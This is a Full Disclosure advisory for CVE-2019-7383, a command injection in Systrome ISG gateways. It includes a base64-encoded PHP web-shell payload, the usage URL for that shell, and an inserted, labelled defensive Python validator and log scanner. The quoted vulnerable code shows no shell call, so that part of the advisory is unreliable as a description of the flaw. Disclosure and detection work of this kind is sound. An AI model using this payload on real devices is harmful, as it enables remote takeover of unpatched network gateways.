List: full-disclosure
Subject: [FD] KSA-Dev-003:CVE-2019-7383 : Remote Code Execution Via shell upload in all systorme ISG products
From: Kingkaustubh via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2019-02-12 9:18:15
Message-ID: c36cd0ee-23f4-1ac2-5b14-ca13dbf939d4 () me ! com
=====================================
Authenticated Shell Command Injection
=====================================
Overview
========
Title: Authenticated Shell Command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7383
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
1. ISG-600C
2. ISG-600H
3. ISG-800W
Tested Version: ISG-V1.1-R2.1_TRUNK-20181105.bin (the respective build for the other products)
Severity: High--Critical
Advisory ID
============
KSA-Dev-003
About the Product:
==================
Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7 security features of the next-generation firewall, is based on user identification and application identification, and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform, based on the big data platform architecture, can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes security visible at any time and anywhere. Systrome cloud gateway is the best access security choice for small and medium enterprises, branch interconnection, and chain enterprises.
Description:
============
An issue was discovered on Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W devices with firmware V1.1-R2.1_TRUNK-20181105.bin. A shell command injection occurs when editing the description of an ISP file. The file network/isp/isp_update_edit.php does not properly validate user input, which leads to shell command injection via the des parameter.
[Additional_information]
The PHP file ./network/isp/isp_update_edit.php does not properly validate user input, which leads to shell command injection. The vulnerable code snippet is the form field that carries the description (note that $item['des'] is echoed unescaped twice, the second time outside any attribute):

    <td><input name="des" id="des" value="<?php echo $item['des'];?>" type="text" <?php echo $item['des'];?> size="50" maxlength="<?php echo XML_MAX_DESC_LEN;?>"/>
[VulnerabilityType Other]
Authenticated Shell Command Injection
[Affected Component]
The PHP file ./network/isp/isp_update_edit.php, des parameter (see the code snippet under Additional_information above).
[Attack Type]
Local
[Impact Code execution]
true
[Attack Vectors]
Visit the URL http://device_ip/network/isp/isp_update_edit.php?pv=ISP_INTL.dat
Adding the string below to the description will write a PHP system command shell into the webroot of the device:

    '`echo PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4KCg== | base64 -d > /usr/local/wwwroot/cmd.php`'

The PHP system shell can then be accessed via a browser, e.g.:
http://device_ip/cmd.php?cmd=ifconfig
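The two defensive checks below are an added example and are not code from the advisory or from Systrome. They show, first, the allowlist validation a fix for isp_update_edit.php should apply to the des parameter before the value reaches any shell command, with the interpolated-string pattern that makes the injection possible shown for contrast (never executed here), and second, a scanner that flags web-server access-log lines in which the des value for isp_update_edit.php carries shell metacharacters, for detection on devices still running the affected firmware. The command name /usr/local/bin/isp_update, the log lines, and the addresses are constructed assumptions, not taken from the device.

```python
"""Defensive checks for the des-parameter injection in isp_update_edit.php.

Added example, not vendor code. All paths, command names and log lines
are constructed assumptions for illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Allowlist for an ISP description: letters, digits, space and a few
# punctuation characters. Shell metacharacters (backtick, $, ;, |, &, <, >,
# quotes, backslash, newline) are deliberately absent from this set.
_DES_ALLOWED = re.compile(r"^[A-Za-z0-9 ._:/@,+-]{0,64}$")


def validate_des(des: str) -> bool:
    """Return True only if `des` consists solely of allowlisted characters."""
    return _DES_ALLOWED.fullmatch(des) is not None


def unsafe_command_string(des: str) -> str:
    """The vulnerable pattern, for contrast only: the raw value is spliced into
    one string destined for a shell, so backticks inside `des` would be
    executed. This function only builds the string; it never runs it."""
    return f"/usr/local/bin/isp_update --des '{des}'"  # hypothetical binary


def build_update_command(des: str) -> list:
    """Hardened replacement: reject anything outside the allowlist, then pass
    the value as a single argv element (subprocess.run(argv) with no shell),
    so its content can never be parsed as shell syntax."""
    if not validate_des(des):
        raise ValueError("description contains disallowed characters")
    return ["/usr/local/bin/isp_update", "--des", des]  # hypothetical binary


# Characters that indicate an attempt to break out of a shell argument.
_SHELL_META = re.compile(r"[`$;|&<>\n]")

# Common/combined log format request line: "METHOD target HTTP/x.y" status
_REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def flag_des_values(urlencoded: str) -> list:
    """Return the decoded des values in a query string or form body that
    contain shell metacharacters."""
    return [v for v in parse_qs(urlencoded).get("des", []) if _SHELL_META.search(v)]


def scan_access_log(lines) -> list:
    """Return (line_number, des_value) for requests to isp_update_edit.php
    whose des query parameter looks like a command-injection attempt.
    POST bodies are not present in a standard access log; run
    flag_des_values() on the decoded form body at a request-logging layer
    to cover that path."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/network/isp/isp_update_edit.php"):
            continue
        for des in flag_des_values(url.query):
            hits.append((n, des))
    return hits


# Constructed sample log lines (not real traffic). The third line carries a
# minimal backtick indicator in the des parameter, URL-encoded.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2018:10:01:02 +0000] "GET /network/isp/isp_update_edit.php?pv=ISP_INTL.dat HTTP/1.1" 200 4123',
    '192.0.2.10 - - [10/Dec/2018:10:01:30 +0000] "GET /network/isp/isp_update_edit.php?pv=ISP_INTL.dat&des=Office+uplink HTTP/1.1" 200 4123',
    '192.0.2.10 - - [10/Dec/2018:10:02:15 +0000] "GET /network/isp/isp_update_edit.php?pv=ISP_INTL.dat&des=%27%60id%60%27 HTTP/1.1" 200 4123',
]

if __name__ == "__main__":
    print("valid description accepted:", validate_des("Office uplink"))
    print("metacharacter description rejected:", not validate_des("'`id`'"))
    for line_no, des in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: suspicious des value {des!r}")
```

The allowlist is the important half: a blocklist of metacharacters is easy to get wrong, whereas restricting the description to the characters it legitimately needs and then passing it as one argv element removes the shell from the picture entirely. The log scanner is a stopgap for fleets that cannot be patched immediately.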
Mitigation
==========
This issue is fixed in firmware ISG-V1.1-R2.1_TRUNK-20181229.bin.
Disclosure:
===========
10-Dec-2018 Discovered the vulnerability
10-Dec-2018 Reported to vendor
04-Jan-2019 Received the fix from vendor
04-Jan-2019 Requested the CVE ID
04-Feb-2019 CVE ID assigned
08-Feb-2019 Advisory published
[Discoverer]
* Kaustubh Padwad,
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/